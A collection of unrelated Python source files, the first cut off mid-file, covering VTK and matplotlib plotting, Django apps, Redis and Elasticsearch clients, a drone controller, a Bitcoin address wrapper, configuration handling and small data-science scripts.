transform = vtk.vtkTransform()
transform.RotateWXYZ(-angle, dz, 1, -dx)
transform.Translate(-x1, -y1, -z1)
out_cylinder.SetTransform(transform)
in_cylinder.SetTransform(transform)
# Cutted object
cuted = vtk.vtkImplicitBoolean()
cuted.SetOperationTypeToIntersection()
cuted.AddFunction(out_cylinder)
cuted.AddFunction(plane1)
cuted.AddFunction(plane2)
cuted2 = vtk.vtkImplicitBoolean()
cuted2.SetOperationTypeToDifference()
cuted2.AddFunction(cuted)
cuted2.AddFunction(in_cylinder)
# Sample
sample = vtk.vtkSampleFunction()
sample.SetImplicitFunction(cuted2)
sample.SetModelBounds(-100 , 100 , -100 , 100 , -100 , 100)
sample.SetSampleDimensions(300, 300, 300)
sample.SetComputeNormals(0)
# Filter
surface = vtk.vtkContourFilter()
surface.SetInputConnection(sample.GetOutputPort())
# Create a mapper
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(surface.GetOutputPort())
# Create an actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
self.ren.AddActor(actor)
self.ren.ResetCamera()
self._initialized = False
def showEvent(self, evt):
if not self._initialized:
self.iren.Initialize()
self._initialized = True
class MainPage(QtGui.QMainWindow):
def __init__(self, parent = None):
super(MainPage, self).__init__(parent)
self.setCentralWidget(VTKFrame())
self.setWindowTitle("Implicitfunction Example")
def categories(self):
return ['Demo', 'Implicit Function', 'Filters']
def mainClasses(self):
return ['vtkCylinder', 'vtkPlane', 'vtkImplicitBoolean', 'vtkSampleFunction', 'vtkContourFilter']
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
w = MainPage()
w.show()
sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"""Color tools for plotting."""
from __future__ import division
from itertools import izip, product
import operator
import numpy as np
import matplotlib as mpl
from .. import _colorspaces as cs
from .._data_obj import cellname, isfactor, isinteraction
from ._base import _EelFigure
def find_cell_colors(x, colors):
"""Process the colors arg from plotting functions
Parameters
----------
x : categorial
Model for which colors are needed.
colors : str | list | dict
Colors for the plots if multiple categories of data are plotted.
**str**: A colormap name; cells are mapped onto the colormap in
regular intervals.
**list**: A list of colors in the same sequence as cells.
**dict**: A dictionary mapping each cell to a color.
Colors are specified as `matplotlib compatible color arguments
<http://matplotlib.org/api/colors_api.html>`_.
"""
if isinstance(colors, (list, tuple)):
cells = x.cells
if len(colors) < len(cells):
err = ("The `colors` argument %s does not supply enough "
"colors (%i) for %i "
"cells." % (str(colors), len(colors), len(cells)))
raise ValueError(err)
return dict(zip(cells, colors))
elif isinstance(colors, dict):
for cell in x.cells:
if cell not in colors:
raise KeyError("%s not in colors" % repr(cell))
return colors
elif colors is None or isinstance(colors, basestring):
return colors_for_categorial(x, colors)
else:
raise TypeError("Invalid type: colors=%s" % repr(colors))
def colors_for_categorial(x, cmap=None):
"""Automatically select colors for a categorial model
Parameters
----------
x : categorial
Model defining the cells for which to define colors.
Returns
-------
colors : dict {cell -> color}
Dictionary providing colors for the cells in x.
"""
if isfactor(x):
return colors_for_oneway(x.cells, cmap)
elif isinteraction(x):
return colors_for_nway([f.cells for f in x.base], cmap)
else:
msg = ("x needs to be Factor or Interaction, got %s" % repr(x))
raise TypeError(msg)
def colors_for_oneway(cells, cmap='jet'):
"""Define colors for a single factor design
Parameters
----------
cells : sequence of str
Cells for which to assign colors.
cmap : str
Name of a matplotlib colormap to use (default 'jet').
Returns
-------
dict : {str: tuple}
Mapping from cells to colors.
"""
if cmap is None:
cmap = 'jet'
cm = mpl.cm.get_cmap(cmap)
n = len(cells)
return {cell: cm(i / n) for i, cell in enumerate(cells)}
def colors_for_twoway(x1_cells, x2_cells, cmap=None):
"""Define cell colors for a two-way design
Parameters
----------
x1_cells : tuple of str
Cells of the major factor.
x2_cells : tuple of str
Cells of the minor factor.
cmap : str
Name of a matplotlib colormap to use (Default picks depending on number
of cells in primary factor).
Returns
-------
dict : {tuple: tuple}
Mapping from cells to colors.
"""
n1 = len(x1_cells)
n2 = len(x2_cells)
if n1 < 2 or n2 < 2:
raise ValueError("Need at least 2 cells on each factor")
if cmap is None:
cm = cs.twoway_cmap(n1)
else:
cm = mpl.cm.get_cmap(cmap)
# find locations in the color-space to sample
n_colors = n1 * n2
stop = (n_colors - 1) / n_colors
samples = np.linspace(0, stop, n_colors)
colors = dict(izip(product(x1_cells, x2_cells), map(tuple, cm(samples))))
return colors
def colors_for_nway(cell_lists, cmap=None):
"""Define cell colors for a two-way design
Parameters
----------
cell_lists : sequence of of tuple of str
List of the cells for each factor. E.g. for ``A % B``:
``[('a1', 'a2'), ('b1', 'b2', 'b3')]``.
cmap : str
Name of a matplotlib colormap to use (Default picks depending on number
of cells in primary factor).
Returns
-------
dict : {tuple: tuple}
Mapping from cells to colors.
"""
ns = map(len, cell_lists)
if cmap is None:
cm = cs.twoway_cmap(ns[0])
else:
cm = mpl.cm.get_cmap(cmap)
# find locations in the color-space to sample
n_colors = reduce(operator.mul, ns)
edge = 0.5 / n_colors
samples = np.linspace(edge, 1 - edge, n_colors)
colors = {cell: tuple(color) for cell, color in
izip(product(*cell_lists), cm(samples))}
return colors
class ColorGrid(_EelFigure):
"""Plot colors for a two-way design in a grid
Parameters
----------
row_cells : tuple of str
Cells contained in the rows.
column_cells : tuple of str
Cells contained in the columns.
colors : dict
Colors for cells.
size : scalar
Size (width and height) of the color squares (the default is to
scale them to fit the figure).
column_label_position : 'top' | 'bottom'
Where to place the column labels (default is 'top').
row_first : bool
Whether the row cell precedes the column cell in color keys. By
default this is inferred from the existing keys.
"""
def __init__(self, row_cells, column_cells, colors, size=None,
column_label_position='top', row_first=None, *args, **kwargs):
if row_first is None:
row_cell_0 = row_cells[0]
col_cell_0 = column_cells[0]
if (row_cell_0, col_cell_0) in colors:
row_first = True
elif (col_cell_0, row_cell_0) in colors:
row_first = False
else:
msg = ("Neither %s nor %s exist as a key in colors" %
((row_cell_0, col_cell_0), (col_cell_0, row_cell_0)))
raise KeyError(msg)
if size is None:
tight = True
else:
tight = False
_EelFigure.__init__(self, "ColorGrid", None, 3, 1, tight, *args, **kwargs)
ax = self.figure.add_axes((0, 0, 1, 1), frameon=False)
ax.set_axis_off()
self._ax = ax
# reverse rows so we can plot upwards
row_cells = tuple(reversed(row_cells))
n_rows = len(row_cells)
n_cols = len(column_cells)
# color patches
for col in xrange(n_cols):
for row in xrange(n_rows):
if row_first:
cell = (row_cells[row], column_cells[col])
else:
cell = (column_cells[col], row_cells[row])
patch = mpl.patches.Rectangle((col, row), 1, 1, fc=colors[cell],
ec='none')
ax.add_patch(patch)
# column labels
self._labels = []
if column_label_position == 'top':
y = n_rows + 0.1
va = 'bottom'
rotation = 40
ymin = 0
ymax = self._layout.h / size
elif column_label_position == 'bottom':
y = -0.1
va = 'top'
rotation = -40
ymax = n_rows
ymin = n_rows - self._layout.h / size
else:
msg = "column_label_position=%s" % repr(column_label_position)
raise ValueError(msg)
for col in xrange(n_cols):
label = column_cells[col]
h = ax.text(col + 0.5, y, label, va=va, ha='left', rotation=rotation)
self._labels.append(h)
# row labels
x = n_cols + 0.1
for row in xrange(n_rows):
label = row_cells[row]
h = ax.text(x, row + 0.5, label, va='center', ha='left')
self._labels.append(h)
if size is not None:
self._ax.set_xlim(0, self._layout.w / size)
self._ax.set_ylim(ymin, ymax)
self._show()
def _tight(self):
# arbitrary default with equal aspect
self._ax.set_ylim(0, 1)
self._ax.set_xlim(0, 1 * self._layout.w / self._layout.h)
# draw to compute text coordinates
self.draw()
# find label bounding box
xmax = 0
ymax = 0
for h in self._labels:
bbox = h.get_window_extent()
if bbox.xmax > xmax:
xmax = bbox.xmax
xpos = h.get_position()[0]
if bbox.ymax > ymax:
ymax = bbox.ymax
ypos = h.get_position()[1]
xmax += 2
ymax += 2
# transform from display coordinates -> data coordinates
trans = self._ax.transData.inverted()
xmax, ymax = trans.transform((xmax, ymax))
# calculate required movement
_, ax_xmax = self._ax.get_xlim()
_, ax_ymax = self._ax.get_ylim()
xtrans = ax_xmax - xmax
ytrans = ax_ymax - ymax
# calculate the scale factor:
# new_coord = x * coord
# new_coord = coord + trans
# x = (coord + trans) / coord
scale = (xpos + xtrans) / xpos
scale_y = (ypos + ytrans) / ypos
if scale_y <= scale:
scale = scale_y
self._ax.set_xlim(0, ax_xmax / scale)
self._ax.set_ylim(0, ax_ymax / scale)
class ColorList(_EelFigure):
"""Plot colors with labels
Parameters
----------
colors : dict
Colors for cells.
cells : tuple
Cells for which to plot colors (default is ``colors.keys()``).
labels : dict (optional)
Condition labels that are used instead of the keys in ``colors``. This
is useful if ``colors`` uses abbreviated labels, but the color legend
should contain more intelligible labels.
h : 'auto' | scalar
Height of the figure in inches. If 'auto' (default), the height is
automatically increased to fit all labels.
"""
def __init__(self, colors, cells=None, labels=None, h='auto', *args,
**kwargs):
if h != 'auto':
kwargs['h'] = h
if cells is None:
cells = colors.keys()
if labels is None:
labels = {cell: cellname(cell) for cell in cells}
elif not isinstance(labels, dict):
raise TypeError("labels=%s" % repr(labels))
_EelFigure.__init__(self, "Colors", None, 2, 1.5, False, None, *args,
**kwargs)
ax = self.figure.add_axes((0, 0, 1, 1), frameon=False)
ax.set_axis_off()
n = len(cells)
text_h = []
for i, cell in enumerate(cells):
bottom = n - i - 1
y = bottom + 0.5
patch = mpl.patches.Rectangle((0, bottom), 1, 1, fc=colors[cell],
ec='none', zorder=1)
ax.add_patch(patch)
text_h.append(ax.text(1.1, y, labels[cell], va='center', ha='left', zorder=2))
ax.set_ylim(0, n)
ax.set_xlim(0, n * self._layout.w / self._layout.h)
# resize the figure to ft the content
if h == 'auto':
width, old_height = self._frame.GetSize()
self.draw()
text_height = max(h.get_window_extent().height for h in text_h) * 1.2
new_height = text_height * n
if new_height > old_height:
self._frame.SetSize((width, new_height))
self._show()
class ColorBar(_EelFigure):
u"""A color-bar for a matplotlib color-map
Parameters
----------
cmap : str | Colormap
Name of the color-map, or a matplotlib Colormap.
vmin : scalar
Lower end of the scale mapped onto cmap.
vmax : scalar
Upper end of the scale mapped onto cmap.
label : None | str
Label for the x-axis (default is the unit, or if no unit is provided
the name of the colormap).
label_position : 'left' | 'right' | 'top' | 'bottom'
Position of the axis label. Valid values depend on orientation.
label_rotation : scalar
Angle of the label in degrees (For horizontal colorbars, the default is
0; for vertical colorbars, the default is 0 for labels of 3 characters
and shorter, and 90 for longer labels).
clipmin : scalar
Clip the color-bar below this value.
clipmax : scalar
Clip the color-bar above this value.
orientation : 'horizontal' | 'vertical'
Orientation of the bar (default is horizontal).
unit : str
Unit for the axis to determine tick labels (for example, ``u'µV'`` to
label 0.000001 as '1').
contours : iterator of scalar (optional)
Plot contour lines at these values.
"""
def __init__(self, cmap, vmin, vmax, label=True, label_position=None,
label_rotation=None,
clipmin=None, clipmax=None, orientation='horizontal',
unit=None, contours=(), *args, **kwargs):
cm = mpl.cm.get_cmap(cmap)
lut = cm(np.arange(cm.N))
if orientation == 'horizontal':
h = 1
ax_aspect = 4
im = lut.reshape((1, cm.N, 4))
elif orientation == 'vertical':
h = 4
ax_aspect = 0.3
im = lut.reshape((cm.N, 1, 4))
else:
raise ValueError("orientation=%s" % repr(orientation))
if label is True:
if unit:
label = unit
else:
label = cm.name
title = "ColorBar: %s" % cm.name
_EelFigure.__init__(self, title, 1, h, ax_aspect, *args, **kwargs)
ax = self._axes[0]
if orientation == 'horizontal':
ax.imshow(im, extent=(vmin, vmax, 0, 1), aspect='auto')
ax.set_xlim(clipmin, clipmax)
ax.yaxis.set_ticks(())
self._contours = [ax.axvline(c, c='k') for c in contours]
if unit:
self._configure_xaxis(unit, label)
elif label:
ax.set_xlabel(label)
if label_position is not None:
ax.xaxis.set_label_position(label_position)
if label_rotation is not None:
ax.xaxis.label.set_rotation(label_rotation)
elif orientation == 'vertical':
ax.imshow(im, extent=(0, 1, vmin, vmax), aspect='auto', origin='lower')
ax.set_ylim(clipmin, clipmax)
ax.xaxis.set_ticks(())
self._contours = [ax.axhline(c, c='k') for c in contours]
if unit:
self._configure_yaxis(unit, label)
elif label:
ax.set_ylabel(label)
if label_position is not None:
ax.yaxis.set_label_position(label_position)
if label_rotation is not None:
ax.yaxis.label.set_rotation(label_rotation)
if (label_rotation + 10) % 360 < 20:
ax.yaxis.label.set_va('center')
elif label and len(label) <= 3:
ax.yaxis.label.set_rotation(0)
ax.yaxis.label.set_va('center')
else:
raise ValueError("orientation=%s" % repr(orientation))
self._show()
|
from django.urls import path
from salvados.views import ListarSalvados, InsertarSalvado, EditarSalvado, BorrarSalvado
urlpatterns=[
path('salvados', ListarSalvados.as_view(), name='salvados_list'),
path('salvados/new', InsertarSalvado.as_view(), name='insertar_salvado'),
path('salvados/edit<int:pk>', EditarSalvado.as_view(), name='editar_salvado'),
path('salvados/delete<int:pk>', BorrarSalvado.as_view(), name='borrar_salvado'),
]
|
import redis
if __name__ == '__main__':
client =redis.Redis(host="10.73.11.21", port=10000)
aa=client.execute_command("info")
print aa
|
from src.CNF import ClauseSet
class Decision:
def __init__(self,cs:ClauseSet):
return
|
from elasticsearch import Elasticsearch
es = Elasticsearch()
host = "localhost"
port = 9200
index = "python"
type = "class1"
# get the document id separately
es.update(index=index,id="50FeTG0BsY0arHYik7Pa",body={"doc": {"mini-version": 7.2 }})
|
#!/usr/bin/python3
def area(width, height):
return width * height
def welcome(name):
print("welcome",name)
welcome("Runoob")
w, h = 4, 5
print("width =", w, "height =", h, "area =",area(w, h))
|
#!/usr/bin/env python
# coding=utf-8
"""This is the main module of the project where the algorithm is executed."""
_author__ = "L. Miguel Vargas F."
__copyright__ = "Copyright 2015, National Polytechnic School, Ecuador"
__credits__ = ["Mani Monajjemi", "Sika Abarca", "Gustavo Scaglia", "Andrés Rosales"]
__license__ = "Noncommercial"
__version__ = "1.0.0"
__maintainer__ = "L. Miguel Vargas F."
__email__ = "lmiguelvargasf@gmail.com"
__status__ = "Development"
from references import *
from position import *
from constants import *
from controller import *
controller = ARDroneController()
def save_positions():
save_list_into_txt(x_n, "x_n")
save_list_into_txt(y_n, "y_n")
save_list_into_txt(z_n, "z_n")
save_list_into_txt(t_n, "t_n")
save_list_into_txt(psi_ez_n, "psi_ez_n")
save_list_into_txt(psi_n, "psi_n")
def print_useful_data(controller, iteration):
data = controller.required_navigation_data
print("Iteration: " + str(iteration))
print("\tX speed: " + str(data["vx"]))
print("\tY speed: " + str(data["vy"]))
print("\tZ position: " + str(data["z"]))
print("\tPsi: " + str(math.degrees(controller.required_navigation_data["psi"])))
def print_adjusted_control_actions(v_xy, v_z, omega_psi):
print("Adjusted Control Actions:")
print("\tV_XY: " + str(v_xy))
print("\tV_Z: " + str(v_z))
print("\tOMEGA_PSI: " + str(omega_psi))
def print_non_adjusted_control_actions(v_xy, v_z, omega_psi):
print("Non-Adjusted Control Actions:")
print("\tV_XY: " + str(v_xy))
print("\tV_Z: " + str(v_z))
print("\tOMEGA_PSI: " + str(omega_psi))
def follow_trajectory():
sampling_frequency = rospy.Rate(1 / T0)
for i in range(len(x_ref_n)):
if controller.last_time is None:
controller.last_time = rospy.Time.now()
dt = 0
else:
current_time = rospy.Time.now()
dt = (current_time - controller.last_time).to_sec()
controller.last_time = current_time
t_n.append(i * T0)
dx = dt * controller.required_navigation_data["vx"]
dy = dt * controller.required_navigation_data["vy"]
try:
x_n.append(x_n[-1] + dx)
y_n.append(y_n[-1] + dy)
except IndexError:
x_n.append(dx)
y_n.append(dy)
z_n.append(controller.required_navigation_data["z"])
psi_n.append(controller.required_navigation_data["psi"])
x_control_action = compute_control_action(x_ref_np1[i], x_ref_n[i], x_n[-1], K_V_XY)
y_control_action = compute_control_action(y_ref_np1[i], y_ref_n[i], y_n[-1], K_V_XY)
psi_ez_n.append(math.atan2(y_control_action, x_control_action))
v_xy = (1 / T0) * (x_control_action * math.cos(psi_ez_n[-1]) + y_control_action * math.sin(psi_ez_n[-1]))
v_xy_adjusted = adjust_control_action(v_xy / V_XY_MAX)
v_z = (1 / T0) * compute_control_action(z_ref_np1[i], z_ref_n[i], z_n[-1], K_V_Z)
v_z_adjusted = adjust_control_action(v_z / V_Z_MAX)
try:
omega_psi = (1 / T0) * (psi_ez_n[-1] - K_OMEGA_PSI * (psi_ez_n[-2] - psi_n[-2]) - psi_n[-2])
except IndexError:
omega_psi = (1 / T0) * (psi_ez_n[-1])
omega_psi_adjusted = adjust_control_action(omega_psi / OMEGA_PSI_MAX)
print_useful_data(controller, i)
print_non_adjusted_control_actions(v_xy, v_z, omega_psi)
print_adjusted_control_actions(v_xy_adjusted, v_z_adjusted, omega_psi_adjusted)
controller.send_linear_and_angular_velocities([v_xy_adjusted, 0, v_z_adjusted],
[0, 0, omega_psi_adjusted])
sampling_frequency.sleep()
if __name__ == "__main__":
rospy.init_node("controller_node", anonymous=True)
controller.get_ready()
controller.send_reset()
controller.send_flat_trim()
controller.send_take_off_and_stabilize(7.0)
print("Start")
follow_trajectory()
controller.send_land()
save_positions()
print("Done!")
|
annee = 1
somme = 100
interet = 4.3/100
while annee<20:
annee = annee+1
gain = somme*interet
somme = somme+gain
print (somme)
|
# -*- coding: utf-8 -*-
# vi: sts=4 et sw=4
from controller import Controller
from jsonrpc.proxy import JSONRPCException
class Address(object):
'''A Bitcoin address. Bitcoin properties of an address (for example its
account) may be read and written like normal Python instance attributes
(foo.account, or foo.account="blah").'''
def __init__(self, address=None):
'''Constructor. If address is empty, generate one.'''
if address is None:
address = Controller().getnewaddress()
try:
if not Controller().validateaddress(address)['isvalid']:
raise InvalidBitcoinAddressError(address)
except JSONRPCException:
raise InvalidBitcoinAddressError(address)
self.address = address
def __str__(self):
return self.address
def __getattr__(self, name):
if 'account' == name:
return Controller().getaccount(self.address)
def __setattr__(self, name, value):
if 'account' == name:
if value is None:
Controller().setaccount(self.address)
else:
Controller().setaccount(self.address, value)
else:
object.__setattr__(self, name, value)
def getReceived(self):
'''Returns the total amount received on this address.'''
return Controller().getreceivedbyaddress(self.address)
def uri(self):
'''Return an URI for the address, of the form "bitcoin:17E9wnB...".
At the moment, the URI takes no other argument yet.'''
return "bitcoin:" + self.address
def qrCode(self, size=80, level='L', formt=None, asURI=True):
'''Return the QR code of the address. If `formt` is None, the method
returns a PIL Image object, otherwise it returns a string containing
the image in the desired format (e.g. 'PNG').
The level can be one of 'L', 'M', 'Q' or 'H'.
If `asURI` is True, encode the address's "bitcoin:" URI, otherwise
encode the raw address.
This method needs the qrencode module, and returns None if the
module is not found.'''
try:
from qrencode import encode_scaled, QR_ECLEVEL_L, QR_ECLEVEL_M, \
QR_ECLEVEL_Q, QR_ECLEVEL_H
except ImportError:
return None
lvl = {'L': QR_ECLEVEL_L, 'M': QR_ECLEVEL_M, 'Q': QR_ECLEVEL_Q, \
'H': QR_ECLEVEL_H}[level]
if asURI:
data = self.uri()
else:
data = self.address
im = encode_scaled(data, size, level=lvl)[2]
if formt is None:
return im
else:
from StringIO import StringIO
buf = StringIO()
im.save(buf, formt)
result = buf.getvalue()
buf.close()
return result
class InvalidBitcoinAddressError(Exception):
'''The Bitcoin address is invalid.'''
pass
|
from django.db import models
# Create your models here.
#Product
class Product(models.Model):
category = models.ForeignKey('Category', related_name='products', on_delete=models.CASCADE)
name = models.CharField(max_length=100)
price = models.DecimalField(max_digits=10, decimal_places=2)
stock = models.PositiveIntegerField()
created_at = models.DateTimeField(auto_now_add=True)
description = models.TextField(blank=True)
slug = models.SlugField(unique=True, blank=True)
class Meta:
ordering = ('name', )
# Category
class Category(models.Model):
name = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
description = models.TextField(blank=True, max_length=100)
slug = models.SlugField(unique=True, blank=True)
class Meta:
ordering = ('name', )
|
import os
import typing
import logging
import textwrap
import configparser
from .logginglib import log_debug
from .logginglib import log_error
from .pylolib import path_like
from .logginglib import get_logger
from .pylolib import human_concat_list
from .pylolib import get_datatype_human_text
from .datatype import Datatype
from .datatype import OptionDatatype
from .abstract_configuration import AbstractConfiguration
class IniConfiguration(AbstractConfiguration):
def __init__(self, file_path: typing.Optional[typing.Union[path_like]] = None) -> None:
"""Create a new abstract configuration.
Raises
------
FileNotFoundError
When the file could not be created
Parameters
----------
file_path : str, pathlib.PurePath, os.PathLike
The file path (including the extension) to use, if not given the
`DEFAULT_INI_PATH` form the `config` will be used, parent
directories are created if they do not exist (and if possible),
default: None
"""
# logger has to be present for the file opening but super() will
# overwrite self._logger, super() cannot be called here because it
# loads the config which is not possible without the file
logger = get_logger(self)
if isinstance(file_path, path_like):
if not os.path.isdir(os.path.dirname(file_path)):
try:
os.makedirs(os.path.dirname(file_path), exist_ok=True)
except OSError:
file_path = None
if not isinstance(file_path, path_like):
from .config import DEFAULT_INI_PATH
file_path = DEFAULT_INI_PATH
log_debug(logger, "Using file path '{}' from config".format(file_path))
try:
os.makedirs(os.path.dirname(file_path), exist_ok=True)
except OSError as e:
log_error(logger, e)
raise e
if os.path.exists(os.path.dirname(file_path)):
self.file_path = file_path
else:
err = FileNotFoundError(("The parent directory '{}' of the ini " +
"file was not found and could not be " +
"created.").format(os.path.dirname(file_path)))
log_error(logger, err)
raise err
super().__init__()
self._logger = logger
def loadConfiguration(self) -> None:
"""Load the configuration from the persistant data."""
log_debug(self._logger, "Loading configuration from ini file '{}'".format(
self.file_path))
config = configparser.ConfigParser(interpolation=None)
config.read(self.file_path)
for section in config.sections():
for key in config[section]:
value = config[section][key]
try:
datatype = self.getDatatype(section, key)
except KeyError:
datatype = None
if datatype == bool:
if isinstance(value, str):
value = value.lower()
if value in ["no", "n", "false", "f", "off", "0"]:
value = False
elif value in ["yes", "y", "true", "t", "on", "1"]:
value = True
else:
value = bool(value)
elif callable(datatype):
value = datatype(value)
self.setValue(section, key, value)
def saveConfiguration(self) -> None:
"""Save the configuration to be persistant."""
config = configparser.ConfigParser(allow_no_value=True,
interpolation=None)
for group in self.getGroups():
for key in self.getKeys(group):
if self.valueExists(group, key):
if not group in config:
config[group] = {}
# prepare the comment
comment = []
try:
comment.append(str(self.getDescription(group, key)))
except KeyError:
pass
try:
datatype = self.getDatatype(group, key)
comment.append("Type: '{}'".format(
get_datatype_human_text(datatype)
))
if isinstance(datatype, OptionDatatype):
comment.append("Allowed values: {}".format(
human_concat_list(datatype.options)
))
except KeyError:
datatype = str
try:
comment.append("Default: '{}'".format(self.getDefault(group, key)))
except KeyError:
pass
# save the comment
if len(comment) > 0:
w = 79
c = "; "
comment_text = []
for l in comment:
comment_text += textwrap.wrap(l, w)
comment = ("\n" + c).join(comment_text)
config[group][c + comment] = None
# prepare the value
val = self.getValue(group, key, False)
if isinstance(val, bool) and val == True:
val = "yes"
elif isinstance(val, bool) and val == False:
val = "no"
elif isinstance(datatype, Datatype):
val = datatype.format(val)
# save the value, adding new line for better looks
config[group][key] = str(val) + "\n"
log_debug(self._logger, "Saving ini configuration to file '{}'".format(
self.file_path))
with open(self.file_path, 'w+') as configfile:
config.write(configfile)
|
import os
import sys
import subprocess
import shutil
import time
import concurrent.futures
import fam
sys.path.insert(0, 'scripts')
sys.path.insert(0, os.path.join("tools", "trees"))
sys.path.insert(0, os.path.join("tools", "msa_edition"))
import saved_metrics
from run_mrbayes import MrbayesInstance
import experiments as exp
def substample_distribution(src, dest, reduce_by):
input_lines = open(src).readlines()
idx = 0
with open(dest, "w") as writer:
for line in input_lines:
if (idx % reduce_by == 0):
writer.write(line)
idx += 1
def subsample(datadir, gene_trees, reduce_by):
inst = MrbayesInstance.get_instance(datadir, gene_trees)
old_tag = inst.get_tag()
inst.frequency = inst.frequency / reduce_by
inst.burnin = inst.burnin / reduce_by
subst_model = inst.subst_model
new_tag = inst.get_tag()
print(new_tag + " -> " + old_tag)
for family in fam.get_families_list(datadir):
gene_trees = fam.build_gene_tree_path(datadir, subst_model, family, old_tag)
new_gene_trees = fam.build_gene_tree_path(datadir, subst_model, family, new_tag)
substample_distribution(gene_trees, new_gene_trees, reduce_by)
if (__name__== "__main__"):
if len(sys.argv) < 4:
print("Syntax error: python " + os.path.basename(__file__) + " gene_tree reduce_by (for instance 10) datadir_list")
print(len(sys.argv))
sys.exit(0)
gene_trees = sys.argv[1]
reduce_by = int(sys.argv[2])
datadirs = sys.argv[3:]
for datadir in datadirs:
print(datadir)
subsample(datadir, gene_trees, reduce_by)
|
from django.conf.urls.defaults import *
from piston.resource import Resource
from devmgr.api.handlers import *
# TODO: CSRF protection currently disabled...fix this!
# The below is stolen from Taedium, maybe I can use that
"""
class CSRFDisabledResource(Resource):
def __init__(self, **kwargs):
super(self.__class>>, self).__init__(**kwargs)
self.csrf_exempt = getattr(self.handler, 'csrf_exmpt', True)
#Uses Django authentication by default
auth = HttpBasicAuthentication()
"""
#device_handler = CSRFDisabledResource(handler=DeviceHandler, authentication=auth)
device_handler = Resource(DeviceHandler)
device_location_handler = Resource(DeviceLocationHandler)
device_allow_track_handler = Resource(DeviceAllowTrackHandler)
device_wipe_handler= Resource(DeviceWipeHandler)
device_c2dm_register_handler = Resource(DeviceC2DMRegisterHandler)
device_c2dm_send_handler = Resource(C2DMSendHandler)
device_loc_frequency_handler = Resource(LocFrequencyHandler)
urlpatterns = patterns('',
(r'^register$', device_handler),
(r'^(?P<device_id>\d+)$', device_handler),
(r'^$', device_handler),
(r'^(?P<device_id>\d+)/location$', device_location_handler),
(r'^(?P<device_id>\d+)/allowtrack$', device_allow_track_handler),
(r'^(?P<device_id>\d+)/wipestatus$', device_wipe_handler),
(r'^c2dm/(?P<device_id>\d+)/register$', device_c2dm_register_handler),
(r'^c2dm/(?P<device_id>\d+)/send$', device_c2dm_send_handler),
(r'^(?P<device_id>\d+)/trackfrequency$', device_loc_frequency_handler),
)
|
from models import User
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import sessionmaker
import traceback
from utils import strToToken
from settings import db_url
def isUserAuthenticated(session, username, password):
token = None
try:
user = session.query(User).filter(User.username==username).first()
password = strToToken(password)
if password == user.password:
token = user.password
return token
except Exception as e:
print('Got exception while getting user..')
print(e)
return token
# function for returning engine
def getEngine(dbUrl):
engine = create_engine(db_url)
return engine
# function for getting session
def getSession(engine):
Session = sessionmaker(bind=engine)
return Session()
# fun for creating user
def createUser(session, firstName, lastName, username, password):
user = User(first_name=firstName, last_name=lastName)
# set user name
user.set_username(username)
# set user password
user.set_password(password)
try:
session.add(user)
session.commit()
print('user created successfully...')
except Exception as e:
print ("Got exception while creating user")
print(e)
session.rollback()
traceback.print_exc()
def getProductDetails(productsList):
productsInfo = {}
if productsList.__len__():
for products in productsList:
# get products details
if products:
productCount = 0
manufacturers = []
for product in products:
productCount += product.quantity
manufacturers.append(product.manufacturer)
product_name = product.__class__.__name__
productsDetails = {'name': product_name, 'quantity': productCount, 'manufacturers': manufacturers}
productsInfo[product_name] = productsDetails
return productsInfo
if __name__ == '__main__':
engine = getEngine(db_url)
session = getSession(engine)
createUser(session, 'John', 'drew', 'john123', '12345678')
|
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
X, y = datasets.make_regression(n_samples=100, n_features=1, noise=20, random_state=4)
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state =1234)
print(X_train.shape)
from linear_reg import LinearRegression
#MSE
def mse(y_true, y_predicted):
return np.mean((y_true - y_predicted)**2)
regression = LinearRegression(lr=0.01, n_iters=1000)
regression.fit(X_train, y_train)
predicted = regression.predic(X_test)
print("dd",predicted)
mse = mse(y_test, predicted)
print(mse)
y_pred_line = regression.predic(X)
cmap = plt.get_cmap("viridis")
fig = plt.figure(figsize=(8,6))
m1 = plt.scatter(X_train, y_train, color = cmap(0.9), s=10)
m2 = plt.scatter(X_test, y_test, color = cmap(0.5), s=10)
plt.plot(X_test, predicted, color="black", linewidth=2, label="Prediction")
plt.show()
|
from django.shortcuts import render
from django.http import HttpResponse
from rest_framework import viewsets
from .serializers import *
from .models import *
def index(request):
return HttpResponse("Hello, world. You're at the ProtoRoute index.")
class RouteGuideViewSet(viewsets.ModelViewSet):
queryset = RouteGuide.objects.all().order_by('name')
serializer_class = RouteGuideSerializer
class ProvenanceViewSet(viewsets.ModelViewSet):
queryset = Provenance.objects.all().order_by('description')
serializer_class = ProvenanceSerializer
class RouteSegmentGuideViewSet(viewsets.ModelViewSet):
queryset = RouteGuideSegment.objects.all().order_by('name')
serializer_class = RouteGuideSegmentSerializer
class RoutePointViewSet(viewsets.ModelViewSet):
queryset = RoutePoint.objects.all().order_by('name')
serializer_class = RoutePointSerializer
class PersonAndOrganizationViewSet(viewsets.ModelViewSet):
queryset = PersonAndOrganization.objects.all().order_by('name')
serializer_class = PersonAndOrganizationSerializer
class TransportNoteViewSet(viewsets.ModelViewSet):
queryset = TransportNote.objects.all().order_by('transport_mode')
serializer_class = TransportNoteSerializer
class MapReferenceViewSet(viewsets.ModelViewSet):
queryset = MapReference.objects.all().order_by('id')
serializer_class = MapReferenceSerializer
class CategoryViewSet(viewsets.ModelViewSet):
queryset = Category.objects.all().order_by('content')
serializer_class = CategorySerializer
class ArticleViewSet(viewsets.ModelViewSet):
queryset = Article.objects.all().order_by('headline')
serializer_class = ArticleSerializer
class GeoPathViewSet(viewsets.ModelViewSet):
queryset = GeoPath.objects.all().order_by('id')
serializer_class = GeoPathSerializer
class MapImageViewSet(viewsets.ModelViewSet):
queryset = MapImage.objects.all().order_by('id')
serializer_class = MapImageSerializer
class VerificationRecordViewSet(viewsets.ModelViewSet):
queryset = VerificationRecord.objects.all().order_by('date_verified')
serializer_class = VerificationRecordSerializer
class ProvenanceViewSet(viewsets.ModelViewSet):
queryset = Provenance.objects.all().order_by('id')
serializer_class = ProvenanceSerializer
